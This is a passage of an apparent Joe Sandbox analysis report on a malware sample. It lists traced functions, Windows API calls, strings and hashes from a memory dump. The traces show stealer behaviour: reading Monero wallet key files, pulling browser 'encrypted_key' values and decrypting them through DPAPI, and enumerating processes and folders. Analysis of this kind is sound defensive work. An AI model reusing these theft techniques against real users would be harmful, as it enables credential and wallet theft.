                                      • Opcode Fuzzy Hash: 5d01b2b37cd7077f21c66b80a8fb0fa4e5cdd11bd36c75342d1df271db9d8a04
                                      • Instruction Fuzzy Hash: 43810472910119ABCB04FBB4DC9AEEEBB38BF94300F504518F547B6091EF746A09DB66
                                      Function 0052F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                        • Part of subcall function 005299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005299EC
                                        • Part of subcall function 005299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00529A11
                                        • Part of subcall function 005299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00529A31
                                        • Part of subcall function 005299C0: ReadFile.KERNEL32(000000FF,?,00000000,0052148F,00000000), ref: 00529A5A
                                        • Part of subcall function 005299C0: LocalFree.KERNEL32(0052148F), ref: 00529A90
                                        • Part of subcall function 005299C0: CloseHandle.KERNEL32(000000FF), ref: 00529A9A
                                        • Part of subcall function 00538E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00538E52
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00541580,00540D92), ref: 0052F54C
                                      • lstrlen.KERNEL32(00000000), ref: 0052F56B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                      • API String ID: 998311485-3310892237
                                      • Opcode ID: ad613eac88453120e82bc2574e6448eebc250bc19401629d1b5f3969c80de776
                                      • Instruction ID: 3d9e003d0515d1b0bbbe5219ba743ac8f702991a2a76d2bbdce3a2d510fd234c
                                      • Opcode Fuzzy Hash: ad613eac88453120e82bc2574e6448eebc250bc19401629d1b5f3969c80de776
                                      • Instruction Fuzzy Hash: 9151F672D10109AADB04FBB4DC9ADEDBB78BFD4300F508528F45667195EF346A09CBA2
                                      Function 005370D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                                      Download Yara Rule
                                      Strings
                                      • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0053718C
                                      • sS, xrefs: 005372AE, 00537179, 0053717C
                                      • sS, xrefs: 00537111
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy
                                      • String ID: sS$sS$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                      • API String ID: 3722407311-1259041206
                                      • Opcode ID: 5797e2bd2b2e3b3712beadcddab95b775f173575c5a82bbbc6a20ba2d1310eff
                                      • Instruction ID: 5b682618626dc96174005216a5d7503c354ded035cd1c57f2e70e147bc924d57
                                      • Opcode Fuzzy Hash: 5797e2bd2b2e3b3712beadcddab95b775f173575c5a82bbbc6a20ba2d1310eff
                                      • Instruction Fuzzy Hash: D35170B1C0421DABDB24EB90DC99BEEBB74BF48304F1044A8E21577181EB746E88DF55
                                      Function 00533560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen
                                      • String ID:
                                      • API String ID: 367037083-0
                                      • Opcode ID: b32dff572fde97d768cf4cd1b5bd8ab57317c8269bb0e5981ce4e0e7785f52ee
                                      • Instruction ID: 46d9137150b7acdf348db7776178345ae1142fb103ed2b065a19bd2b79f44f89
                                      • Opcode Fuzzy Hash: b32dff572fde97d768cf4cd1b5bd8ab57317c8269bb0e5981ce4e0e7785f52ee
                                      • Instruction Fuzzy Hash: 2741F1B1D10209AFCB04EFA4D896AEEBB74FB54304F108418F51677291EB75AA09CF92
                                      Function 00529CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 005299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005299EC
                                        • Part of subcall function 005299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00529A11
                                        • Part of subcall function 005299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00529A31
                                        • Part of subcall function 005299C0: ReadFile.KERNEL32(000000FF,?,00000000,0052148F,00000000), ref: 00529A5A
                                        • Part of subcall function 005299C0: LocalFree.KERNEL32(0052148F), ref: 00529A90
                                        • Part of subcall function 005299C0: CloseHandle.KERNEL32(000000FF), ref: 00529A9A
                                        • Part of subcall function 00538E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00538E52
                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00529D39
                                        • Part of subcall function 00529AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NR,00000000,00000000), ref: 00529AEF
                                        • Part of subcall function 00529AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00524EEE,00000000,?), ref: 00529B01
                                        • Part of subcall function 00529AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NR,00000000,00000000), ref: 00529B2A
                                        • Part of subcall function 00529AC0: LocalFree.KERNEL32(?,?,?,?,00524EEE,00000000,?), ref: 00529B3F
                                        • Part of subcall function 00529B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00529B84
                                        • Part of subcall function 00529B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00529BA3
                                        • Part of subcall function 00529B60: LocalFree.KERNEL32(?), ref: 00529BD3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                      • String ID: $"encrypted_key":"$DPAPI
                                      • API String ID: 2100535398-738592651
                                      • Opcode ID: 147eab0e7791c3a721ab2febb2532347e6f9a1dffff4cf29c1d4597e49a01c7f
                                      • Instruction ID: ae6b425e43838b0119f5aab7826084c927b0e896ae8c3dec79254b936f0b9bdb
                                      • Opcode Fuzzy Hash: 147eab0e7791c3a721ab2febb2532347e6f9a1dffff4cf29c1d4597e49a01c7f
                                      • Instruction Fuzzy Hash: CC3154B6D10219ABCF04DFE4DC85BEFBBB8BF49304F144518E905A7281E7709A44CBA5
                                      Function 00538680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,005405B7), ref: 005386CA
                                      • Process32First.KERNEL32(?,00000128), ref: 005386DE
                                      • Process32Next.KERNEL32(?,00000128), ref: 005386F3
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                      • CloseHandle.KERNEL32(?), ref: 00538761
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1066202413-0
                                      • Opcode ID: 823be6cc19b5a976c90ee2cdf654bbf55c17d321169c21d82919ae3e7c444f73
                                      • Instruction ID: a7234b9a588733b22d0d1a50a7792cb2c65537578215ba9f62a094e3b80125cc
                                      • Opcode Fuzzy Hash: 823be6cc19b5a976c90ee2cdf654bbf55c17d321169c21d82919ae3e7c444f73
                                      • Instruction Fuzzy Hash: 42312B72901219ABCB24EF54DC49FEEBB78FB85700F104199F50AB61A0DB746A45CFA1
                                      Function 00537980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00540E00,00000000,?), ref: 005379B0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 005379B7
                                      • GetLocalTime.KERNEL32(?,?,?,?,?,00540E00,00000000,?), ref: 005379C4
                                      • wsprintfA.USER32 ref: 005379F3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                      • String ID:
                                      • API String ID: 377395780-0
                                      • Opcode ID: 0282032562c20e375336e3c1e79c4232a26eae1ee4b4bd54682ca81a53fd6a3c
                                      • Instruction ID: 3e48296acda297816421f05f27733aa28cbf18b678dc07e3c7d0bddc4bdb506c
                                      • Opcode Fuzzy Hash: 0282032562c20e375336e3c1e79c4232a26eae1ee4b4bd54682ca81a53fd6a3c
                                      • Instruction Fuzzy Hash: 5A112AB2904219ABCB14DFC9DD45BBEBBF8FB4CB11F10411AF606A2280D27D5940CBB5
                                      Function 0053C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 0053C74E
                                        • Part of subcall function 0053BF9F: __amsg_exit.LIBCMT ref: 0053BFAF
                                      • __getptd.LIBCMT ref: 0053C765
                                      • __amsg_exit.LIBCMT ref: 0053C773
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0053C797
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 300741435-0
                                      • Opcode ID: 63703ceff800568f1488e77ec03f7922d4dbc35c04c99f2317d32491932c3fe6
                                      • Instruction ID: edaf29ee9f50685b5c547b441cbe6e6f80d906134043d90e0eac0ed683dc747a
                                      • Opcode Fuzzy Hash: 63703ceff800568f1488e77ec03f7922d4dbc35c04c99f2317d32491932c3fe6
                                      • Instruction Fuzzy Hash: 3FF0BE369047029BE721BBB8980FB9E3FA0BF80724F20414DFA04B72D2DB6469419F56
                                      Function 00534F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00538DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00538E0B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00534F7A
                                      • lstrcat.KERNEL32(?,00541070), ref: 00534F97
                                      • lstrcat.KERNEL32(?,00F19A50), ref: 00534FAB
                                      • lstrcat.KERNEL32(?,00541074), ref: 00534FBD
                                        • Part of subcall function 00534910: wsprintfA.USER32 ref: 0053492C
                                        • Part of subcall function 00534910: FindFirstFileA.KERNEL32(?,?), ref: 00534943
                                        • Part of subcall function 00534910: StrCmpCA.SHLWAPI(?,00540FDC), ref: 00534971
                                        • Part of subcall function 00534910: StrCmpCA.SHLWAPI(?,00540FE0), ref: 00534987
                                        • Part of subcall function 00534910: FindNextFileA.KERNEL32(000000FF,?), ref: 00534B7D
                                        • Part of subcall function 00534910: FindClose.KERNEL32(000000FF), ref: 00534B92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                      • String ID:
                                      • API String ID: 2667927680-0
                                      • Opcode ID: 4d68c304a26d7ea43a4de60dbe60aacefdc2a60d7bc574e25a96998a5b09425b
                                      • Instruction ID: f351bc6625e183446bfe00554ea38bcaff846762958ad2acfa037009363d7214
                                      • Opcode Fuzzy Hash: 4d68c304a26d7ea43a4de60dbe60aacefdc2a60d7bc574e25a96998a5b09425b
                                      • Instruction Fuzzy Hash: 0321657690030567C754F760EC4AEEE373CBB94300F008554B65BA3181EEB596C88F96